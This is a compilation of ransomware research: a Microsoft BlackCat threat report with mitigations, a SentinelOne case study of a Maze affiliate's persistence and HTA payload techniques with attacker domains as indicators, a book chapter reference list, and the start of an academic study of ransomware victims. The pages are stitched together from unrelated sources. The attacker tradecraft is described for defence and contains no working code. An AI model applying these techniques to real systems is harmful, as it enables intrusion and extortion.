Microsoft tracks one of these affiliate groups as DEV-0237 . Also known as FIN12 , DEV-0237 is notable for its distribution of Hive, Conti, and Ryuk ransomware. We’ve observed that this group added BlackCat to their list of distributed payloads beginning March 2022. Their switch to BlackCat from their last used payload (Hive) is suspected to be due to the public discourse around the latter’s decryption methodologies.

DEV-0504 is another active affiliate group that we’ve seen switching to BlackCat for their ransomware attacks. Like many RaaS affiliate groups, the following TTPs might be observed in a DEV-0504 attack:

• Entry vector that can involve the affiliate remotely signing into devices with compromised credentials, such as into devices running software solutions that allow for remote work
• The attackers’ use of their access to conduct discovery on the domain
• Lateral movement that potentially uses the initial compromised account
• Credential theft with tools like Mimikatz and Rubeus

DEV-0504 typically exfiltrates data on devices they compromise from the organization using a malicious tool such as StealBit —often named “send.exe” or “sender.exe”. PsExec is then used to distribute the ransomware payload. The group has been observed delivering the following ransom families before their adoption of BlackCat beginning December 2021:

• BlackMatter
• LockBit 2.0

Defending against BlackCat ransomware

Today’s ransomware attacks have become more impactful because of their growing industrialization through the RaaS affiliate model and the increasing trend of double extortion. The incidents we’ve observed related to the BlackCat ransomware leverage these two factors, making this threat durable against conventional security and defense approaches that only focus on detecting the ransomware payloads. Detecting threats like BlackCat, while good, is no longer enough as human-operated ransomware continues to grow, evolve, and adapt to the networks they’re deployed or the attackers they work for.

Instead, organizations must shift their defensive strategies to prevent the end-to-end attack chain. As noted above, while attackers’ entry points may vary, their TTPs remain largely the same. In addition, these types of attacks continue to take advantage of an organization’s poor credential hygiene and legacy configurations or misconfigurations to succeed. Therefore, defenders should address these common paths and weaknesses by hardening their networks through various best practices such as access monitoring and proper patch management. We provide detailed steps on building these defensive strategies against ransomware in this blog .

In the BlackCat-related incidents we’ve observed, the common entry points for ransomware affiliates were via compromised credentials to access internet-facing remote access software and unpatched Exchange servers. Therefore, defenders should review their organization’s identity posture, carefully monitor external access, and locate vulnerable Exchange servers in their environment to update as soon as possible. The financial impact, reputation damage, and other repercussions that stem from attacks involving ransomware like BlackCat are not worth forgoing downtime, service interruption, and other pain points related to applying security updates and implementing best practices.

Leveraging Microsoft 365 Defender’s comprehensive threat defense capabilities

Microsoft 365 Defender helps protect organizations from attacks that deliver the BlackCat ransomware and other similar threats by providing cross-domain visibility and coordinated threat defense. It uses multiple layers of dynamic protection technologies and correlates threat data from email, endpoints, identities, and cloud apps. Microsoft Defender for Endpoint detects tools like Mimikatz, the actual BlackCat payload, and subsequent attacker behavior. Threat and vulnerability management capabilities also help discover vulnerable or misconfigured devices across different platforms; such capabilities could help detect and block possible exploitation attempts on vulnerable devices, such as those running Exchange. Finally, advanced hunting lets defenders create custom detections to proactively surface this ransomware and other related threats.

Additional mitigations and recommendations

Defenders can also follow the following steps to reduce the impact of this ransomware:

• Turn on Microsoft Defender Antivirus . Turn on  cloud-delivered protection  in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a large amount of new and unknown variants.
• Enforce strong, randomized local administrator passwords. Use tools like Local Administrator Password S olution (LAPS).
• Require multifactor authentication (MFA) for local device access, RDP access, and remote connections through virtual private networks (VPNs) and Outlook Web Access. Solutions like Windows Hello or Fast ID Online (FIDO) v2.0 security keys let users sign in using biometrics and/or a physical key or device.
• Turn on Microsoft Defender Firewall .
• Implement controlled folder access to help prevent files from being altered or encrypted by ransomware. Set controlled folder access to Enabled or Audit mode .
• Investigate and remediate vulnerabilities in Exchange servers. Also, determine if implementing the Exchange Emergency Mitigation service is feasible for your environment. This service helps keep your Exchange servers secure by applying mitigations to address potential threats against your servers.

Microsoft 365 Defender customers can also apply the additional mitigations below:

• Use  advanced protection  against ransomware.
• Turn on  tamper protection  in Microsoft Defender for Endpoint to prevent malicious changes to security settings. Enable  network protection  in Microsoft Defender for Endpoint and Microsoft 365 Defender to prevent applications or users from accessing malicious domains and other malicious content on the internet.
• Ensure Exchange servers have applied the mitigations referenced in the related Threat Analytics report .
• Block credential stealing from the Windows local security authority subsystem ( lsass.exe )
• Block process creations originating from PSExec and WMI commands
• Block executable files from running unless they meet a prevalence, age, or trusted list criterion

For a full list of ransomware mitigations regardless of threat, refer to this article: Rapidly protect against ransomware and extortion .

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

Microsoft 365 Defender Threat Intelligence Team

Microsoft 365 Defender detections

Microsoft defender antivirus.

• Ransom:Win32/BlackCat!MSR
• Ransom:Win32/BlackCat.MK!MTB
• Ransom:Linux/BlackCat.A!MTB

Microsoft Defender for Endpoint EDR

Alerts with the following titles in the security center can indicate threat activity on your network:

• An active ‘BlackCat’ ransomware was detected
• ‘BlackCat’ ransomware was detected
• BlackCat ransomware

Hunting queries

Microsoft 365 defender.

To locate possible ransomware activity, run the following queries.

Suspicious process execution in PerfLogs path

Use this query to look for processes executing in PerfLogs—a common path used to place the ransomware payloads.

Suspicious registry modification of MaxMpxCt parameters

Use this query to look for suspicious running processes that modify registry settings to increase the number of outstanding requests allowed (for example, SMB requests when distributing ransomware via its PsExec methodology).

Suspicious command line indicative of BlackCat ransom payload execution

Use these queries to look for instances of the BlackCat payload executing based on a required command argument for it to successfully encrypt ‘–access-token’.

Suspected data exfiltration

Use this query to look for command lines that indicate data exfiltration and the indication that an attacker may attempt double extortion.

Related Posts

• Microsoft Defender
• Vulnerabilities and exploits

“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps  

Microsoft discovered a vulnerability pattern in multiple popular Android applications that could enable a malicious application to overwrite files in the vulnerable application’s internal data storage directory, which could lead to arbitrary code execution and token theft, among other impacts. We have shared our findings with Google’s Android Application Security Research team, as well as the developers of apps found vulnerable to this issue. We anticipate that the vulnerability pattern could be found in other applications. We’re sharing this research more broadly so developers and publishers can check their apps for similar issues, fix as appropriate, and prevent them from being introduced into new apps or releases.

Threat actors misuse OAuth applications to automate financially driven attacks  

Microsoft Threat Intelligence presents cases of threat actors misusing OAuth applications as automation tools in financially motivated attacks.

• Threat actors

Star Blizzard increases sophistication and evasion in ongoing attacks  

Microsoft Threat Intelligence continues to track and disrupt malicious activity attributed to a Russian state-sponsored actor we track as Star Blizzard, who has improved their detection evasion capabilities since 2022 while remaining focused on email credential theft against targets.

• Mobile threats

Social engineering attacks lure Indian users to install Android banking trojans  

Microsoft has observed ongoing activity from mobile banking trojan campaigns targeting users in India with social media messages and malicious applications designed to impersonate legitimate organizations and steal users’ information for financial fraud scams.

Case Study: Catching a Human-Operated Maze Ransomware Attack In Action

Executive summary.

• Maze ransomware is one of the most widespread ransomware strains currently in the wild and is distributed by different capable actors.
• We discovered a Maze affiliate deploying tailor-made persistence methods prior to delivering the ransomware.
• The actor appears to have used a stolen certificate to sign its Beacon stager.
• In common with other attacks, the actor used an HTA payload as an interactive shell, which we were able to catch live and deobfuscate.

Maze ransomware has been used extensively in the last year or so as the final payload by many different actors around the world. This year, Maze operators notoriously began extorting companies not just by encrypting files but also through threatening to publish exfiltrated files online. We recently caught one Maze affiliate at the early stage of attempting to spread through a network belonging to one of our clients.

In this post, we share details about the methods used by this Maze affiliate in order to shed light on their tactics and to help security teams hunt for similar IOCs in their own networks.

Attack Entry Point

As previously reported in other Maze incidents , the attackers used RDP to gain access to an internet-facing machine, probably by brute-forcing the Administrator’s password. One of the attacks against a US company began on Saturday the 4th of July, a date obviously chosen in the hope that many people – particularly security staff – might not be at work that day.

The attackers connected using RDP and uploaded their beacon payload, disguised as a known Microsoft binary named netplwiz.exe . Their payload had the same icon and description as the genuine binary of the same name and was also signed, most likely with a stolen certificate.

Sysinternals’ sigcheck.exe on original netplwiz.exe :

In the malicious netplwiz.exe , we can see the stolen certificate:

A closer look at the certificate:

This executable is a simple packer that loads Cobalt Strike’s Beacon version 4. This packer is pretty simple, and does the following:

• Hides their window
• Checks for a debugger using isDebuggerPresent
• Decodes a XOR’ed stageless beacon (note – using VirtualAllocExNuma for memory allocation instead of the more commonly used VirtualAlloc/Ex )
• Executes the beacon

The decoding function looks like this:

We dumped the beacon from memory and parsed its configuration :

Tailor-Made Persistence Mechanisms

Although the entry method is pretty common, the attackers displayed great creativity in their persistence methods, which were tailor-made to the machine they found themselves on.

For example, one host was running a SolarWinds Orion instance. This Orion product uses RabbitMQ as the internal messaging component and is installed with the product. RabbitMQ is written in Erlang, and therefore uses the Erlang runtime service ( erlsrv.exe ) to run.

The attackers relied on this dependency chain to spawn themselves in this erlsrv.exe process and to gain persistence on the host, as the RabbitMQ service is running erlsrv.exe .

We could see this when the attackers dropped two DLLs containing their beacon stager to disk and then began interfering with the RabbitMQ service:

The DLL that was hijacked is version.dll, which is normally loaded from the system32 folder. By dropping it in the same folder as erlsrv.exe , it loaded their version.dll , and it loaded acluapi.dll containing the beacon.

After restarting the RabbitMQ service, a Cobalt Strike Beacon started communicating to the same domain as the one from netplwiz, but this time from erlsrv.exe and SYSTEM integrity level.

In another case showing similar adaptation to the local environment, the attackers targeted the Java Updater which runs when the computer starts and dropped a DLL that is loaded by jusched.exe when it starts.

After installing persistency, the attackers did some domain reconnaissance and uploaded ngrok to C:Windowsdwm.exe and used it for tunneling.

They also ran this:

The UI0Detect, like the name implies, detects and alerts the user if a program in session 0 tries to interact with the desktop. It’s important for them to disable this service in order to avoid alerting the user in case they accidentally pop a message box or starting a GUI application while running as SYSTEM.

HTA Payload

When they found an interesting server they wanted to laterally move to, they used sc.exe and deployed a tool that gave them an online shell on that target.

Specifically, they ran this command (IP changed):

They used mshta to run an HTA payload that was hosted on their site. We believe the HTA is their way of working online on remote computers before deploying their Cobalt Strike Beacon, if they believe it’s worth it.

The HTA payload is a somewhat sophisticated and automatically obfuscated code that we believe is self-made (as we’ve found no evidence of it online).

You can see the obfuscated and our de-obfuscated version here .

When ran, it first sends some basic information of the computer, such as OS Version, routing info, Domain Controller name (if the computer is member of a domain) and more:

The payload contains a variable that is empty when it is first run. In this case, it runs another HTA from the server using mshta.exe , which is identical to itself except that the variable now contains the value “prfx” instead of being empty.

Consequently, it enters a loop of running HTAs from the server.

The simplified code looks as follows:

The payload is interesting because it has some unique behavior:

• It can be run both as a JScript file and as an HTA file
• It never receives simple cmd.exe commands from the server, only HTAs (that may run cmd.exe themselves)
• It’s obfuscated automatically and differently every time it is requested from the server

Also worth noting from a hunting perspective is that it runs net1.exe directly, instead of net.exe , probably to evade EDR and command-line based detection methods.

All of the above shows that these are very capable attackers. Although they used mostly known methods, they also showed some creativity to compromise targets successfully and move laterally inside them with ease and speed. However, they were still caught and mitigated by the SentinelOne agent before any harm was done.

As their HTA-serving server is still online, and since this campaign is still going strong, we recommend security teams to check for the following IOCs in their EDR data or SIEM and quickly mitigate any that are found to prevent the ransomware being deployed.

Indicators of Compromise

HTA Payload Servers crt.officecloud[.]top crt.globalsign[.]icu mhennigan.safedatasystems[.]com

CS Beacon Server ocspverisign[.]pw

Other Tools Used ngrok.exe Certificate signer: “Clubessential, LLC.”

Full Beacon Configuration

Agent Tesla | Old RAT Uses New Tricks to Stay on Top

Case study: why you shouldn’t trust ntdll from kernel image load callbacks, related posts, fin7 reboot | cybercrime gang enhances ops with new edr bypasses and automated attacks, capratube remix | transparent tribe’s android spyware targeting gamers, weapons enthusiasts, acidpour | new embedded wiper variant of acidrain appears in ukraine.

Ransomware Case Studies

• First Online: 25 February 2021

Cite this chapter

• Matthew Ryan 3  

Part of the book series: Advances in Information Security ((ADIS,volume 85))

2211 Accesses

3 Citations

3 Altmetric

This chapter examines four major ransomware cases, with the first major ransomware attack in 2013 being used as a template for developing an influx of attacks since 2016. The individual case studies were chosen based on their global impact on organisations and high-profile media reports surrounding the attacks. The case study analysis process analysed the attack methodology and the outcome of each attack to determine similarities and evolutionary changes between each subsequent attack. The analysis also sought to detail the method and sophistication level of each attack, the encryption process and request for payment. These components provide the foundation for further understanding the rising threat posed by ransomware in later chapters.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Subscribe and save.

• Get 10 units per month
• Download Article/Chapter or eBook
• 1 Unit = 1 Article or 1 Chapter
• Cancel anytime
• Available as PDF
• Read on any device
• Instant download
• Own it forever
• Available as EPUB and PDF
• Compact, lightweight edition
• Dispatched in 3 to 5 business days
• Free shipping worldwide - see info
• Durable hardcover edition

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Note: Four case studies were deemed to be an appropriate number to accurately demonstrate the evolution of major ransomware attacks profiles over a six-year period.

Note: In 2018, an FBI investigation in WannaCry identified Marcus Hutchins as MalwareTech. Whilst initially Hutchins was hailed a hero for his role in stopping WannaCry, he was later arrested and has plead guilty for the development of Kronos malware. Kronos was a piece of malware used to steal banking credentials. (See Winder 2019 ).

Note: The term “crown jewels” is a cybersecurity term synonymous with high-value data and systems. The term broadly applies to an organisation’s high-value data which typically includes intellectual property, customer data and privileged user account information.

M. Alazab, Profiling and classifying the behavior of malicious codes. J. Syst. Softw. 100 , 91–102 (2015)

Article   Google Scholar  

R. Anderson, GameOver Zeus botnet disrupted: Collaborative effort among international partners, 7 Nov 2014

Google Scholar  

M. Anderson, ‘NotPetya’: Latest ransomware is a warning note from the future, IEEE Spectrum (2017). Available online: https://spectrum.ieee.org/tech-talk/computing/it/notpetya-latest-ransomware-is-a-warning-note-from-the-future . Accessed 22 Feb 2019

Australian Tax Office, Scam alerts. (2020). Available online: https://www.ato.gov.au/general/online-services/identity-security/scam-alerts/ . Accessed 17 Aug 2020

B. Bechtol, Enabling violence and instability, in North Korean Military Proliferation in the Middle East and Africa , vol. 44, (University Press of Kentucky, 2018)

C. Beek, Necurs Botnet leads the world in sending spam traffic, McAfee Labs . (11 Mar 2018). Available online: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/necurs-botnet-leads-the-world-in-sending-spam-traffic/ . Accessed 13 June 2018

Berry, A., J. Homan, R. Eitzman, WannaCry malware profile, FireEye Threat Research . (2017). Available online: https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html . Accessed 2 Jan 2019

T. Bossert, Press briefing on the attribution of the WannaCry malware attack to North Korea, 19 Dec 2017

T. Brewster, Google warns ransomware boom scored crooks $2 million a month, Forbes . (25 July 2019) 2017 [Online]. Available online: https://www.forbes.com/sites/thomasbrewster/2017/07/25/google-ransomware-multi-million-dollar-business-with-locky-and-cerber/#758974576caf . Accessed 17 Jan 2019

E. Bursztein, K. McRoberts, L. Invernizzi, Tracking desktop ransomware payments, Black Hat . Las Vegas, 2017 Google

S. Chow, Hacked: The Bangladesh Bank Heist, Aljazeera . (24 May 2018) 2018 [Online]. Available online: https://www.aljazeera.com/programmes/101east/2018/05/hacked-bangladesh-bank-heist-180523070038069.html . Accessed 13 Nov 2018

C. Cimpanu, M.E.Doc software was backdoored 3 times, servers left without updates Since 2013, Bleeping Computer . 6 July 2017 (2017)

M. Conti, A. Gangwal, S. Ru, On the economic significance of ransomware campaigns: A bitcoin transactions perspective. Comput. Secur. 79 , 162–189 (2018)

Department of Homeland Security, Alert (TA17-132A): Indicators associated with WannaCry ransomware. (12 May 2017)

P. Ducklin, Ransomware -“Locky” ransomware – what you need to know, Naked Threats . (2016). Available online: https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/ . Accessed 24 Feb 2019

K. Eichensehr, Three questions on the WannaCry attribution to North Korea, Just Security . (2017). Available online: https://www.justsecurity.org/49889/questions-wannacry-attribution-north-korea/ . Accessed 10 June 2018

N. Etaher, G. Weir, M. Alazab, From ZeuS to Zitmo: Trends in banking malware, in IEEE International Conference on Trust, Security and Privacy in Computing and Communications , (Trustcom IEEE, Piscataway, 2015)

Federal Bureau of Investigation, FBI Alert – Identification of ransomware variant called Locky, 11 July 2016

L. Garber, Government officials disrupt two major cyberattack systems. Computer 47 (7), 16–21 (2014)

A. Gazet, Comparative analysis of various ransomware virii. J. Comput. Virol. 6 (1), 77–90 (2010)

D. Gerstein, WannaCry virus: A lesson in global unpreparedness. Available online: https://www.rand.org/blog/2017/05/wannacry-virus-a-lesson-in-global-unpreparedness.html . Accessed 3 June 2018

A. Greenberg, The untold story of NotPetya, the most devastating cyber attack in history, WIRED . (2018a). Available online: https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ . Accessed 23 Jan 2019

A. Greenberg, The WannaCry ransomware hackers made some real ametuer mistakes, WIRED . (2018b). Available online: https://www.wired.com/2017/05/wannacry-ransomware-hackers-made-real-amateur-mistakes/ . Accessed 5 June 2018

A. Ivanov, O. Mamedov, ExPetr/Petya/NotPetya is a wiper, not ransomware. (2017). Available online: https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/ . Accessed 14 Dec 2018

K. Jarvis, CryptoLocker ransomware, Threats & Defenses Threat Analysis . (2013). Available online: https://www.secureworks.com/research/cryptolocker-ransomware . Accessed 3 Jan 2019

L. Kessem, The Necurs Botnet: A Pandora’s box of malicious spam, IBM Security Intelligence . (24 Apr 2017). Available online: https://securityintelligence.com/the-necurs-botnet-a-pandoras-box-of-malicious-spam/ . Accessed 22 Feb 2019

M. Korolov, Ransomware took in $1 billion in 2016 – improved defenses may not be enough to stem the tide, CSO. 5 Jan 2017 2017 [Online]. Available online: https://www.csoonline.com/article/3154714/ransomware-took-in-1-billion-in-2016-improved-defenses-may-not-be-enough-to-stem-the-tide.html . Accessed 11 Feb 2019

P. Kruse, Locky spreading through Facebook. (20 Nov 2016). Available online: https://twitter.com/peterkruse/status/800414481545187328 . Accessed 2 Mar 2019

E. Lucas, Cyberphobia: Identity, Trust, Security and the Internet (Bloomsbury Publishing, London, 2015)

L. Matthew, Boeing is the latest WannaCry ransomware victim, Forbes . (2018). Available online: https://www.forbes.com/sites/leemathews/2018/03/30/boeing-is-the-latest-wannacry-ransomware-victim/#218e8ea96634 . Accessed 1 June 2018

D. Maynor, M. Olney, Y. Younan, The medic connection, Cisco TALOS . Available online: https://blog.talosintelligence.com/2017/07/the-medoc-connection.html . Accessed 22 Feb 2019

A. McLean, ​WannaCry reportedly hitting speed cameras in Victoria, ZDNet . (2017). Available online: https://www.zdnet.com/article/wannacry-reportedly-hitting-speed-cameras-in-victoria/ . Accessed 2 April 2018

A. McNeil, How did the WannaCry ransomworm spread?, Blog.Malwarebytes.com . (30 May 2017). Available online: https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ . Accessed 10 June 2018

D. Meyer, WannaCry ransoms suddenly leave attackers, Bitcoin Wallets . (2017). Available online: http://fortune.com/2017/08/03/wannacry-ransom-bitcoin/ . Accessed 11 June 2018

M. Molloy, Operation Tovar: The latest attempt to eliminate key botnets, Threat Research . (2014). Available online: https://www.fireeye.com/blog/threat-research/2014/07/operation-tovar-the-latest-attempt-to-eliminate-key-botnets.html . Accessed 13 Dec 2018

National Audit Office, Investigation: WannaCry Cyber Attack and the NHS (National Audit Office, London, 2018)

National Health Service, Statement on reported NHS cyber-attack, 13 May 2017

L.H. Newman, The ransomware meltdown experts warned about is here, WIRED . (2017). Available online: https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ . Accessed 6 June 2018

L.H. Newman, The leaked NSA spy tool that hacked the world, WIRED . (2018). Available online: https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ . Accessed 6 June 2018

Palisse, A., H. Le Bouder, J.-L. Lanet, C. Le Guernic, A. Legay, Ransomware and the Legacy Crypto API, The 11th International Conference on Risks and Security of Internet and Systems . Roscoff, France, 5th–7th September 2016 (Springer, 2016)

D. Palmer, Locky ransomware: Why this menace keeps coming back, ZDNet. 7 Sept 2017 (2017) [Online]. Available online: https://www.zdnet.com/article/locky-ransomware-why-this-menace-keeps-coming-back/ . Accessed 27 Feb 2019

S. Ragan, Malicious images on Facebook lead to Locky ransomware, CSO . (2016). Available online: https://www.csoonline.com/article/3143173/malicious-images-on-facebook-lead-to-locky-ransomware.html . Accessed 14 Feb 2019

O. Ralph, R. Armstrong, Mondelez sues Zurich in test for cyber hack insurance, Financial Times. New York, 10 Jan 2019–11 Jan 2019

M. Rivero, Locky ransomware returns to the game with two new flavors. (25 Aug 2017). Available online: https://blog.malwarebytes.com/cybercrime/2017/08/locky-ransomware-returns-to-the-game-with-two-new-flavors/ . Accessed 25 Feb 2019

J. Saarinen, Hackers launch massive Locky ransomware campaign, itNews. 1 Sept 2017, (2017) [Online]. Available online: https://www.itnews.com.au/news/hackers-launch-massive-locky-ransomware-campaign-472295 . Accessed 21 Feb 2019

J. Shea, How is NATO meeting the challenge of cyberspace? PRISM 7 (2), 18–29 (2017)

J. Smith, Hospital pays hackers $17,000 in Bitcoins to return computer network, ZDNet. 18 Feb 2016 (2016) [Online]. Available online: https://www.zdnet.com/article/hospital-pays-hackers-17000-in-bitcoins-to-return-computer-network/ . Accessed 22 Feb 2019

K. Sood, S. Hurley, NotPetya technical analysis – a triple threat: File encryption, MFT encryption, credential theft. 29 June 2017. Available online: https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/ . Accessed 4 Mar 2019

Symantec, Ransom.WannaCry, (2017). Available online: https://www.symantec.com/security-center/writeup/2017-051310-3522-99 . Accessed 7 June 2018

A. Taylor, NotPetya Malware Attributed . (16 Feb 2018)

S. Thakkar, Ransomware – Exploring the electronic form of extortion. Int. J. Sci. Res. Dev. 2 (10), 123–126 (2014)

G. Troy, Locky ransomware attacks ramp up. 28 Apr 2017. Available online: https://blog.appriver.com/2017/08/locky-ransomware-attacks-increase . Accessed 23 Feb 2019

A. Winckles, Here’s how the ransomware attack was stopped – and why it could soon start again, The Conversation . (2017). Available online: https://theconversation.com/heres-how-the-ransomware-attack-was-stopped-and-why-it-could-soon-start-again-77745 . Accessed 21 Nov 2018

D. Winder, WannaCry Hero Marcus Hutchins pleads guilty to creating banking malware, Forbes. 20 Apr 2019 (2019) [Online]. Available online: https://www.forbes.com/sites/daveywinder/2019/04/20/wannacry-hero-marcus-hutchins-pleads-guilty-to-creating-banking-malware/#13f645a4513e . Accessed 23 June 2019

J. Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (The MIT Press, Cambridge, 2018)

Book   Google Scholar  

Download references

Author information

Authors and affiliations.

Maroubra, NSW, Australia

Matthew Ryan

You can also search for this author in PubMed   Google Scholar

Rights and permissions

Reprints and permissions

Copyright information

© 2021 The Author(s), under exclusive license to Springer Nature Switzerland AG

About this chapter

Ryan, M. (2021). Ransomware Case Studies. In: Ransomware Revolution: The Rise of a Prodigious Cyber Threat. Advances in Information Security, vol 85. Springer, Cham. https://doi.org/10.1007/978-3-030-66583-8_5

Download citation

DOI : https://doi.org/10.1007/978-3-030-66583-8_5

Published : 25 February 2021

Publisher Name : Springer, Cham

Print ISBN : 978-3-030-66582-1

Online ISBN : 978-3-030-66583-8

eBook Packages : Computer Science Computer Science (R0)

Share this chapter

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

• Publish with us

Policies and ethics

• Find a journal
• Track your research

• Search Menu
• Sign in through your institution
• Editor's Choice
• Author Guidelines
• Submission Site
• Open Access
• About Journal of Cybersecurity
• Editorial Board
• Advertising and Corporate Services
• Journals Career Network
• Self-Archiving Policy
• Journals on Oxford Academic
• Books on Oxford Academic

Article Contents

Introduction, review of prior work, hypotheses development, research method and analysis of findings, interpretation and discussion, conclusions, acknowledgements, appendix 1: profile of participant organizations and corresponding attacks characteristics, appendix 2: sample interview questions (phase 1), appendix 3: impact assessment exercise exemplar, appendix 4: sample interview questions (phase 2), appendix 5: criteria used to assess the security posture of organizations, appendix 6: security posture exemplars, appendix 7: profile of organizations.

• < Previous

An empirical study of ransomware attacks on organizations: an assessment of severity and salient factors affecting vulnerability

• Article contents
• Figures & tables
• Supplementary Data

Lena Yuryna Connolly, David S Wall, Michael Lang, Bruce Oddson, An empirical study of ransomware attacks on organizations: an assessment of severity and salient factors affecting vulnerability, Journal of Cybersecurity , Volume 6, Issue 1, 2020, tyaa023, https://doi.org/10.1093/cybsec/tyaa023

• Permissions Icon Permissions

This study looks at the experiences of organizations that have fallen victim to ransomware attacks. Using quantitative and qualitative data of 55 ransomware cases drawn from 50 organizations in the UK and North America, we assessed the severity of the crypto-ransomware attacks experienced and looked at various factors to test if they had an influence on the degree of severity. An organization’s size was found to have no effect on the degree of severity of the attack, but the sector was found to be relevant, with private sector organizations feeling the pain much more severely than those in the public sector. Moreover, an organization’s security posture influences the degree of severity of a ransomware attack. We did not find that the attack target (i.e. human or machine) or the crypto-ransomware propagation class had any significant bearing on the severity of the outcome, but attacks that were purposefully directed at specific victims wreaked more damage than opportunistic ones.

In recent years, Europol’s annual Internet Organised Crime Threat Assessment report has consistently identified ransomware as a top priority; their latest bulletin states that ‘ransomware remains one of the, if not the, most dominant threats, especially for public and private organisations within as well as outside Europe’ [ 1 ]. Furthermore, as starkly evidenced by an international survey of 5000 IT managers, the incidence of ransomware attacks is growing exponentially [ 2 ]. Similar trends have been observed by government and law enforcement bodies [ 3 , 4 ]. Ransomware attacks can potentially generate substantial financial rewards for offenders, but the ransom – which in most cases is not paid – is just a fraction of the overall cost of the attack in terms of reputational damage and loss of business [ 3 , 5 ].

Since ransomware first arrived on the scene in a major way about the year 2013, the volume of academic literature produced on this topic has mushroomed. Important advances such as sophisticated detection methods and innovative intrusion prevention systems have been put forward. Organizations are advised to implement effective security education, introduce policies and technical controls, install antivirus software, promote strong e-mail hygiene, upgrade old systems, execute regular patching, apply the ‘least privileges’ approach, segregate the network perimeter and implement effective backup practices [ 6 , 7 ]. Although the aforementioned types of work are of tremendous importance to a preventative strategy, they are not by themselves sufficient. This is because most of the research on ransomware to date has focused primarily on its technical aspects, with comparatively little attention being given to understanding the socio-technical side of the attack or the characteristics of organizations [ 8 ]. So, while there is a strong emphasis on developing ransomware countermeasures, there is a lack of studies that examine the real experiences of organizations that have actually fallen victim to ransomware attacks.

It may be tempting to assume certain things about what makes an organization more or less vulnerable to an attack, but we should not be so presumptuous. Although research on cybercrime victimization has significantly expanded over the past two decades, the majority of studies focus on individual-level offences such as online bullying, harassment and stalking. Holt and Bossler [ 9 ] make the point that for some types of cybercrime, such as malware and ransomware, our understanding of what causes individuals and organizations to fall victim is not well developed. Our work addresses this limitation by focusing on ransomware crime and collecting data from the actual victims of ransomware.

Generally, the risk of cybercrime victimization has been addressed by studying characteristics of the offender [ 10 ], the victim [ 11 ] and the crime itself [ 12 ]. Our article focuses on the latter two and is motivated by several calls in the literature to better understand typical victims of ransomware attacks, with a view towards developing solutions that prevent or mitigate this sinister problem [ 9 , 13 , 14 ].

To date, only a small number of studies have directly looked at the experiences of organizations that have fallen victim to ransomware. Of these few (see Table 1 ), the majority consider things at a rather cursory level. Our study, which is based on a substantial sample of 55 ransomware attacks and draws upon qualitative and quantitative data, helps to address this gap in the literature by presenting detailed findings on the antecedents and consequences of actual ransomware attacks within 50 organizations. Our objectives were to

Previous empirical studies of ransomware attacks on organizations

Assess the degree of severity of ransomware attacks within organizations;

Explore how characteristics of the organization and characteristics of the attack affect the severity of the outcome.

Within the literature on cybercrime in general, there have been various efforts to understand the factors that make individuals more prone to becoming victims. Drawing upon Lifestyle Theory and Routine Activity Theory, Agustina [ 23 ] proposes several behavioural and environmental factors that should, in theory at least, elevate the risk of being victimized. In practice, however, as found by Ngo and Paternoster [ 24 ], these theories do not hold up to empirical scrutiny. Our work differs from these previous studies in two ways: first, we are looking not at cybercrime in general, but specifically at ransomware attacks; secondly, our focus is not on individual victims, but rather on organizations.

Although several reports [ 1–4 ] suggest that the number of ransomware attacks against businesses continues to rise steadily, it is hard to form any clear sense of the true extent of ransomware attacks. The difficulty of accurately measuring and comparing cybercrime rates has been remarked upon by Furnell et al . [ 25 ]. Statistics about the incidence of ransomware attacks vary wildly. In an international study based on 574 participants across 77 countries, BCI [ 26 ] reported that 31% of respondents had been afflicted by ransomware. In contrast, a large-scale survey of Internet users in Germany revealed that only 3.6% of individuals had suffered a ransomware attack [ 27 ]. Simoiu et al . [ 5 ] estimated that about 2–3% of their sample of 1180 American adults were hit by ransomware between 2016 and 2017. Similarly, Ioanid et al . [ 20 ] reported that 2% of their sample of 103 Romanian small-to-medium enterprises (SMEs) were affected by the WannaCry attack that year. Against those low incidence rates, Hull et al . [ 18 ] found that as many as 61% of UK respondents had experienced at least one attack, and Shinde et al . [ 19 ] reported that 20% of respondents to their survey in the Netherlands were victims of ransomware, although it must be acknowledged that both those studies were based on quite small samples. All of these conflicting survey findings create a rather muddled picture. This, of course, can be put down to differences in sampling methods, response rates, temporal factors and units of analysis, but our essential point is this: it is generally agreed that ransomware presents a grave threat and has adversely affected many organizations, yet we know very little about the experiences of organizations that were attacked or the root causes that left them open to a successful violation.

There are very few empirical studies of the impact of ransomware within organizations or the factors that make organizations vulnerable. Al-Rimy et al . [ 28 ] present a literature survey of ransomware threat success factors, but the scope of their work extends only to infection vectors and enabling technologies (i.e. cryptography techniques, payment methods, ransomware development kits). They do not consider any organizational or socio-technical factors.

Our extensive search of the literature revealed just a handful of studies that looked directly at the experiences of organizations that were victims of ransomware (see Table 1 ). To summarize the key findings of these studies: ransomware attacks had major financial and emotional impact on victims, and the common factors that led to the attacks seemed to be a lack of security education or diligence, with organization type and size also emerging as possible factors impacting the likelihood of an attack.

Byrne and Thorpe [ 21 ] observe that ‘there is a gap in the literature with regards to examining the issue [of ransomware] from a company's perspective and that of its user base.’ Our study aims to make a contribution towards addressing this gap. In the next sections, we present a number of factors that we believe might affect the vulnerability of an organization to a ransomware attack, as well as characteristics of the attack weapon and method that could affect the severity of impact.

Organization characteristics: size and sector

